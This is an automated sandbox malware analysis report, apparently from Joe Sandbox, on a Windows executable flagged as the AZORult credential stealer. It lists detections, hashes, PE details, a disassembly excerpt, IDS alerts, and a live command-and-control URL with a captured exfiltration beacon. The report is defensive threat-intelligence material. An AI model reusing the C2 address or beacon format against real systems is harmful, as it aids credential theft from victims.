Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	15 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
8p5iD52knN.exe	62%	Virustotal		Browse
8p5iD52knN.exe	95%	ReversingLabs	Win32.Trojan.MintZamg
8p5iD52knN.exe	100%	Avira	HEUR/AGEN.1318101
8p5iD52knN.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpCn	0%	Avira URL Cloud	safe
http://51.15.241.168/	0%	Avira URL Cloud	safe
http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.php	0%	Avira URL Cloud	safe
http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpmn	0%	Avira URL Cloud	safe
https://dotbit.me/a/	0%	Avira URL Cloud	safe
http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpl	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpCn	8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.3.dr	false		high
http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpl	8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpmn	8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.15.241.168/	8p5iD52knN.exe, 00000000.00000002.1908661617.000000000066A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ip-api.com/json	8p5iD52knN.exe, 8p5iD52knN.exe, 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8p5iD52knN.exe, 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://dotbit.me/a/	8p5iD52knN.exe, 8p5iD52knN.exe, 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8p5iD52knN.exe, 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
51.15.241.168	unknown	France		12876	OnlineSASFR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582990
Start date and time:	2025-01-01 10:21:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	8p5iD52knN.exe renamed because original name is a hash value
Original Sample Name:	c30e2baf61f34324ccbd0b0168def45e.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 26 Number of non-executed functions: 59
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.190.159.64, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
04:22:23	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OnlineSASFR	loligang.x86.elf	Get hash	malicious	Mirai	Browse	212.129.47.239
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	62.210.51.189
	nsharm5.elf	Get hash	malicious	Mirai	Browse	51.159.173.14
	nsharm.elf	Get hash	malicious	Mirai	Browse	163.172.143.216
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	51.158.216.108
	StGx54oFh6.exe	Get hash	malicious	Quasar	Browse	51.15.17.193
	1AqzGcCKey.exe	Get hash	malicious	Quasar	Browse	51.15.17.193
	BJtvb5Vdhh.exe	Get hash	malicious	Quasar	Browse	51.15.17.193
	HquJT7q6xG.exe	Get hash	malicious	Quasar	Browse	51.15.17.193
	hKvlV6A1Rl.exe	Get hash	malicious	Quasar	Browse	51.15.17.193

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8p5iD52knN.exe_423721fef99bf032cbd4c8368b16262299f_d9dac82a_7f569724-35bd-4147-9070-cf3d399e1f88\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.929253751081848
Encrypted:	false
SSDEEP:	96:5bYK3knbKyZrmsi0hhi+7MnEQXIDcQVc6ccE1cw3D3YC+HbHg/8BRTf3o8Fa9KOW:eKUWmmN0rY/ijqMZL2EzuiFcZ24IO8X
MD5:	63A9F3E64A415C7223D5D42CFDD56C84
SHA1:	8D13F6BE17A191168864B29288B4BB018D24321F
SHA-256:	46C4097E8D0B2A37D591E0734C92DD160F34B3222DC5F4A793FF6A804CE26FCA
SHA-512:	25ADAEBCAED98AC0C83F2CDCE702F847BE1BCF93B9F4EA289FA60C5A8770AF030822893D7181A9ECF92F82954D1A5FAFE4B73B0C691839D6EFAB6DB5DA9F4A21
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.1.9.6.9.2.6.7.1.1.1.0.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.1.9.6.9.2.7.6.7.9.8.5.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.5.6.9.7.2.4.-.3.5.b.d.-.4.1.4.7.-.9.0.7.0.-.c.f.3.d.3.9.9.e.1.f.8.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.1.5.9.1.6.3.-.8.7.3.0.-.4.2.7.9.-.b.7.9.7.-.9.7.9.a.f.2.6.2.6.7.a.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.p.5.i.D.5.2.k.n.N...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.8.-.0.0.0.1.-.0.0.1.4.-.5.2.e.f.-.3.1.9.a.2.e.5.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.e.4.0.8.8.7.d.d.2.3.e.1.b.c.8.4.5.1.3.b.1.3.4.3.e.0.3.d.a.b.a.0.0.0.0.f.f.f.f.!.0.0.0.0.9.a.e.0.5.4.9.7.5.2.7.3.3.b.7.9.f.2.4.4.f.c.c.b.6.5.7.2.7.9.2.d.a.c.d.6.8.b.5.0.!.8.p.5.i.D.5.2.k.n.N...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D2B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Jan 1 09:22:07 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	43354
Entropy (8bit):	2.795357252227803
Encrypted:	false
SSDEEP:	192:KfpoWBZKXzOUYspLTuhT1vp8cYqBLT8U48fbid/YoUlDj04GXKkm7bX9cd6Pj1d:IiWBJTcT4pBYq9T8G1lDSalDRPBd
MD5:	977B4C3CD1950CA3F5BA174AA10F68BB
SHA1:	67CCEFA2AC1E052608DBC9D353BF68879FBD847D
SHA-256:	E45A26E7181B1FDA82B3B6F106FEE695F4F9CCF0C414FFD33713E99B05906A9B
SHA-512:	A072AB1C214EBED1B2DB10C8D6A72F82583037EDDAAD0387A74F608F01A055E4165F270E67A8658DC1A42F1F8F446477D8824BA1B0F284E577DB066672746917
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......?.ug............4...........l...<.......d....(..........T.......8...........T............1...w......................................................................................................eJ......,.......GenuineIntel............T...........4.ug.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER600A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8314
Entropy (8bit):	3.6947866948395105
Encrypted:	false
SSDEEP:	192:R6l7wVeJ4V6Cp16Y9lSUyXgmff2pDG89bFbosfg/jm:R6lXJC6C76Y/SUyXgmffEFbbfw6
MD5:	846547F8075DC5F519D6BF38B1E1100F
SHA1:	01B055F819546759CD060E61CEA500C312FB9502
SHA-256:	06BD58F5CFE4F1EE9F08202BC2A2D55246A7F4720E78307C3EDF9DE9A9CEC597
SHA-512:	2324713FF6421DAFE5701E3726962EEBE62CB87D4CD8F1318D546114B583B1860953E9A090E189894B0AF74C38C82F6BF314C4E0B4612543AD7EAE34C39F8FF2
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER603A.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.460279840692546
Encrypted:	false
SSDEEP:	48:cvIwWl8zslJg77aI94CCWpW8VY00Ym8M4Ji0ZFi0+q86vMitUknudfd:uIjf/I7DD7VjJrBnDtUyudfd
MD5:	8ECA31C211253D6586FC928192C11748
SHA1:	C1EB6394D3D08A4980CBA2849B782843A0872B08
SHA-256:	49EBD9E3207D8FB63469BDDDD6BB7961B695D2A4B9D90F8FBA52267AEFD60BD6
SHA-512:	889B37695561E1FA630C2E3DB336DB9282B2C2DCBB86D331AEB2E26EC01DD658B2C6871C82F68CE28D62D1433F8C228EA3DFDC1218BE7C2C725C045D4CB6B294
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="656664" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.46540816049214
Encrypted:	false
SSDEEP:	6144:cIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNvdwBCswSbW:hXD94+WlLZMM6YFHd+W
MD5:	3020B81274ED43129CB0862112862575
SHA1:	8F09595AB3A6B437F8C621A6BAA738327478F403
SHA-256:	1B5AE17E058F9A9B0783536C2C19600EF63B2B9B5406FA92B6F859F5C3B5AD4A
SHA-512:	F268D407B27DE79ACFABEFB0F3E6C2EF1423653110DD3B7C636BDBD045036CFAB64C60A358F90C7F1561C66AC145ADD5B22EC77E5B0CDD2D1822250BB2CD4C2B
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..]..\..............................................................................................................................................................................................................................................................................................................................................* J.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.945829270167779
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	8p5iD52knN.exe
File size:	313'344 bytes
MD5:	c30e2baf61f34324ccbd0b0168def45e
SHA1:	9ae0549752733b79f244fccb6572792dacd68b50
SHA256:	0ac763391fc56711f3df8e6d6c047bd299c2b7052a69fb66a43fcab1c1b74826
SHA512:	c97c413b36e96f394d4a4a7a965881910dceb22b59ebdb273f306e4db06d322318d6ace1ea06b660c077e516641ff21216a769b921364a24fe7d00eb98614721
SSDEEP:	6144:7wQIfxC1Hqu69oRYT5hpjhFRIb9gyUiwd:hIfxCFqboRo5jhFCgy9Y
TLSH:	AE64AD127B92C0B6C44324758E14CBB59FBEB57528656F4FABC84EBD0F34AC1CA2174A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I`..I`..I`......I`......I`.....OI`......I`..Ia.NI`......I`......I`......I`.Rich.I`.........PE..L......Y.........."........

File Icon


Icon Hash:	1222480848224800

Static PE Info

General

Entrypoint:	0x406213
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x59A0E48A [Sat Aug 26 03:01:30 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	8938b6606fdcc703cae7999268748e55

Entrypoint Preview

Instruction
call 00007FED388DF39Eh
jmp 00007FED388D6A9Dh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [00445150h+ecx*8]
je 00007FED388D6C35h
inc ecx
cmp ecx, 2Dh
jc 00007FED388D6C13h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FED388D6C30h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [00445154h+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007FED388DDB80h
test eax, eax
jne 00007FED388D6C28h
mov eax, 004452B8h
ret
add eax, 08h
ret
call 00007FED388DDB6Dh
test eax, eax
jne 00007FED388D6C28h
mov eax, 004452BCh
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007FED388D6C07h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007FED388D6BA7h
pop ecx
mov esi, eax
call 00007FED388D6BE1h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007FED388DDB32h
test eax, eax
jne 00007FED388D6C27h
push 0000000Ch
pop eax
pop ebp
ret
call 00007FED388D6BC4h
mov ecx, dword ptr [ebp+08h]
mov dword ptr [eax], ecx
xor eax, eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, dword ptr [ebp+08h]
xor eax, eax
cmp esi, eax
jne 00007FED388D6C34h
push eax
push eax

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[C++] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x43c9c	0xf2	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x43c24	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4e000	0x42c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x53000	0x1e3c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x41fd8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3f000	0x214	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3dd29	0x3de00	27e5d58daf96009cfb2d2419da943f34	False	0.628716856060606	data	6.975637092375793	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3f000	0x5884	0x5a00	6eb301060eb780bbbdd2559377cadfe5	False	0.37395833333333334	data	5.130199861641048	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x45000	0x6830	0x2200	970aabe4f6c07c31d5fce58e51e8416c	False	0.2565487132352941	data	3.0727696145488217	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.mysec3	0x4c000	0x1005	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4e000	0x42c8	0x4400	64788b0d166acb761a9ad48e1b403db1	False	0.23494944852941177	data	6.218523193543295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x53000	0x206a	0x2200	73c8c35047b9e040a6f55d42378f9295	False	0.7254136029411765	data	6.335499609177209	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
ZADAPUPAJOWIHIVENONIRALINU	0x521c8	0x100	ASCII text, with no line terminators	Croatian	Croatia	0.734375
ZAWAHEVECUZAWITAPUWOKIJOLAMICILE	0x52158	0x70	ASCII text, with no line terminators	Croatian	Croatia	0.8928571428571429
RT_BITMAP	0x4e280	0x2db8	Device independent bitmap graphic, 72 x 54 x 24, image size 11664	Croatian	Croatia	0.12867395762132605
RT_ICON	0x51048	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Croatian	Croatia	0.3850844277673546
RT_DIALOG	0x52108	0x4c	data	Croatian	Croatia	0.8289473684210527
RT_GROUP_ICON	0x520f0	0x14	data	Croatian	Croatia	1.1
None	0x51038	0xa	data	Croatian	Croatia	1.8

Imports

DLL	Import
KERNEL32.dll	GetConsoleAliasesW, GetLastError, SetLastError, GetProcAddress, CreateNamedPipeA, CreateMemoryResourceNotification, LoadLibraryA, AddAtomW, FreeEnvironmentStringsW, VirtualProtect, GetCurrentDirectoryA, SetProcessShutdownParameters, LocalFree, GetStartupInfoW, CompareStringW, CompareStringA, CloseHandle, CreateFileA, GetTimeZoneInformation, GetLocaleInfoW, FreeLibrary, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, InitializeCriticalSectionAndSpinCount, SetFilePointer, IsValidLocale, ExitThread, FindResourceExA, GetSystemTimes, GetTickCount, FindFirstChangeNotificationW, GetCPInfo, GlobalMemoryStatus, SetEnvironmentVariableA, GetComputerNameA, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, IsValidCodePage, GetOEMCP, GetACP, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedCompareExchange, InterlockedExchange, MultiByteToWideChar, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCommandLineA, GetStartupInfoA, RtlUnwind, RaiseException, LCMapStringW, LCMapStringA, GetStringTypeW, HeapAlloc, HeapCreate, HeapDestroy, VirtualFree, FatalAppExitA, VirtualAlloc, HeapReAlloc, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetCurrentThread, ExitProcess, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetStringTypeA, SetConsoleCtrlHandler, HeapSize, GetTimeFormatA, GetDateFormatA, GetModuleHandleA
USER32.dll	UnloadKeyboardLayout, GetNextDlgGroupItem, LoadMenuIndirectA, BeginPaint, LoadIconW, GetRegisteredRawInputDevices, AppendMenuW, PeekMessageA, MapVirtualKeyExW, DlgDirSelectComboBoxExW, OpenClipboard, GetClipboardSequenceNumber, CallMsgFilterA, InsertMenuItemW
GDI32.dll	SetPixel, SetRectRgn, CreateCompatibleDC, CreateDiscardableBitmap, StretchBlt
ADVAPI32.dll	LookupPrivilegeNameA, OpenEventLogA
SHELL32.dll	ExtractAssociatedIconA, ShellAboutA, DragQueryFileW, ExtractIconExA, ShellExecuteA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Croatian	Croatia

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-01T10:22:06.950300+0100	2029467	ET MALWARE Win32/AZORult V3.3 Client Checkin M14	1	192.168.2.4	49730	51.15.241.168	80	TCP
2025-01-01T10:22:06.950300+0100	2810276	ETPRO MALWARE AZORult CnC Beacon M1	1	192.168.2.4	49730	51.15.241.168	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 10:22:06.018258095 CET	49730	80	192.168.2.4	51.15.241.168
Jan 1, 2025 10:22:06.023894072 CET	80	49730	51.15.241.168	192.168.2.4
Jan 1, 2025 10:22:06.023972034 CET	49730	80	192.168.2.4	51.15.241.168
Jan 1, 2025 10:22:06.024120092 CET	49730	80	192.168.2.4	51.15.241.168
Jan 1, 2025 10:22:06.029648066 CET	80	49730	51.15.241.168	192.168.2.4
Jan 1, 2025 10:22:06.950241089 CET	80	49730	51.15.241.168	192.168.2.4
Jan 1, 2025 10:22:06.950299978 CET	49730	80	192.168.2.4	51.15.241.168
Jan 1, 2025 10:22:06.950392008 CET	80	49730	51.15.241.168	192.168.2.4
Jan 1, 2025 10:22:06.950407982 CET	49730	80	192.168.2.4	51.15.241.168
Jan 1, 2025 10:22:06.950443983 CET	49730	80	192.168.2.4	51.15.241.168
Jan 1, 2025 10:22:06.955158949 CET	80	49730	51.15.241.168	192.168.2.4

HTTP Request Dependency Graph

51.15.241.168

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	51.15.241.168	80	7064	C:\Users\user\Desktop\8p5iD52knN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 10:22:06.024120092 CET	302	OUT	POST /AED77D05-A028-477C-B013-04F33F1385C3/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: 51.15.241.168 Content-Length: 105 Cache-Control: no-cache Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 ec 26 66 9c 45 70 9d 31 14 8b 30 6c 8b 30 62 8b 30 67 8b 31 11 8b 30 62 8b 30 65 ef 47 11 ed 26 66 9d 26 66 9d Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;1&fEp10l0b0g10b0eG&f&f
